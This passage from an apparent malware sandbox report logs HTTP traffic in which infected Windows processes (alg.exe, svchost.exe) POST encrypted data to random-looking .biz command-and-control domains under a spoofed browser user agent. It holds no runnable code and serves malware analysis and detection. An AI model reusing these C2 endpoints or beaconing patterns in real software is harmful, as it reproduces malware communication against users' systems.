                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.117571115 CEST786OUTData Raw: 83 3f 8f c6 9d d3 72 82 06 03 00 00 59 6a 92 da e2 dd 77 a1 43 4b 5a 02 a0 45 36 53 91 12 5c 2a b6 75 79 2f 71 f5 f2 b3 21 82 c4 b9 f4 a8 19 ac f9 d9 1f 25 ac 68 c6 2f c0 c1 ce 8a 9f a6 59 f1 01 5f 89 f9 55 e3 49 26 c4 d6 36 e4 a1 eb 65 65 c3 41
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ?rYjwCKZE6S\*uy/q!%h/Y_UI&6eeA{Pv-ii>]aPA{MJ8?S6_\5r*Sw]Mda*&0e=E17EpWffq]^c`*B6{erY;j|(
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.863157988 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1e5aa2b00de50ef030e0e227d488cc07|8.46.123.33|1728394128|1728394128|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              43192.168.2.44986718.208.156.248802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.329600096 CEST342OUTPOST /h HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.329854965 CEST778OUTData Raw: cf 96 ab 9c e7 9f de 5a fe 02 00 00 10 5b 29 02 77 f6 c3 d5 37 af 40 b1 c2 d0 58 a8 d3 c5 8b b1 77 21 99 e8 70 8b 35 7f 94 85 44 82 d1 19 31 b4 28 a7 eb 02 34 8c 1e ee 90 07 c2 f8 49 f8 66 f3 c4 2f 3b 5a cf 97 b9 8a 5b e9 1a bb 11 66 26 3a 78 5c
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Z[)w7@Xw!p5D1(4If/;Z[f&:x\'VSR%jjw}qP^cua!~1w!7M'P@1Ja \RwDfs7%}'Szk9v|}gX2wM:M=T)^vhSf<*W;P0\%
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.805532932 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a689e3b38512a2cf5cc8e5bf04f62df0|8.46.123.33|1728394128|1728394128|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              44192.168.2.44987235.164.78.200804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.007145882 CEST343OUTPOST /m HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.007164955 CEST786OUTData Raw: 2f 18 d1 7d 62 a7 ec 14 06 03 00 00 98 2b f0 cb 94 77 a9 e1 9f 1f 79 ca 5b f1 c8 ca 17 b2 e8 73 90 3d 09 fa 3b d8 ee a3 e1 b3 61 8d 1f 06 9f 54 f8 3c 47 06 4a 11 8b 20 38 a7 c4 da 20 12 a2 16 d2 10 ff 36 80 fe ae 5b 9b 81 4c db 9a a8 d6 a7 42 fa
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /}b+wy[s=;aT<GJ 8 6[LB_}mhG(i%@UHC[tdrIV;m.*9.{"j|<\K3wnZ:(~%hU.JP*@O|?_\A
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658593893 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bfc137724f4b506fa2a6001631c1a0df|8.46.123.33|1728394129|1728394129|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660540104 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bfc137724f4b506fa2a6001631c1a0df|8.46.123.33|1728394129|1728394129|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.662575960 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bfc137724f4b506fa2a6001631c1a0df|8.46.123.33|1728394129|1728394129|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              45192.168.2.449877208.100.26.245802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.236701965 CEST352OUTPOST /pboamknl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.236725092 CEST778OUTData Raw: da 10 2f 03 a2 60 87 61 fe 02 00 00 3f d0 56 d9 29 f8 e5 55 d9 02 21 01 11 c2 a1 c1 d2 7a 83 be cd 26 04 48 75 f0 f6 2c 05 f9 7c 94 0d 4b 50 82 48 e9 ef 99 a5 7b 18 cc 7c cf 8d 62 b7 46 a0 24 7b 42 93 8a a5 62 16 0b 79 84 ab 3c 4c 9b 28 0d f6 86
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /`a?V)U!z&Hu,|KPH{|bF${Bby<L(=s.tCVgpXARB(OpbH-gt%RupG>^?C#"KUb-sPg-+A9swb=Zl4eSh6^BC,'#1^68L|G5
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.657612085 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660530090 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.661571980 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.662606001 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.811058044 CEST356OUTPOST /mfuaeqrjbxmv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.811090946 CEST778OUTData Raw: fb e9 0d c8 50 fb de 79 fe 02 00 00 ac 4a 98 62 c9 77 de 35 88 c1 15 11 85 9f 97 fd d7 e5 34 9b 20 a1 b7 6a 0a 40 c6 2d 8d 3d d2 a6 00 73 5a 3b 12 64 32 c8 13 e6 b0 44 c7 5c 9f 1c bf aa 3d ba b2 29 8f 88 0a d1 32 0b a0 2f 0b 02 be 57 bb 88 c8 9a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: PyJbw54 j@-=sZ;d2D\=)2/W)~|Q+^>z0/)#0$O;!e9btSF8Q"\O^F`Z"I#2v~%d3E6F-9$ L)VpPbst2tb
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.929364920 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              46192.168.2.4498833.94.10.34804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.817447901 CEST360OUTPOST /nxbumxilirhmvku HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.817636967 CEST786OUTData Raw: 9e e9 b3 c7 e5 6b 6a 25 06 03 00 00 d1 27 de 53 26 38 55 22 98 21 12 80 e0 c5 fb 18 8e bb d6 94 21 ac f1 e1 d2 44 aa e6 60 43 be d6 fb 04 d2 e6 7c e2 ac da eb 96 a9 dd 72 df 28 a1 62 4c 9c 1e d8 51 96 9b 84 62 40 f7 e9 3f 8a 88 8b 2a 25 b4 b8 8d
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: kj%'S&8U"!!D`C|r(bLQb@?*% ;xY*f3IC"M>P1T|%:5azFUE7.-?]Rz~E}P=Oobw7*h*X6Zd#"r|4PA"21K;)K_}%C
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.294512033 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
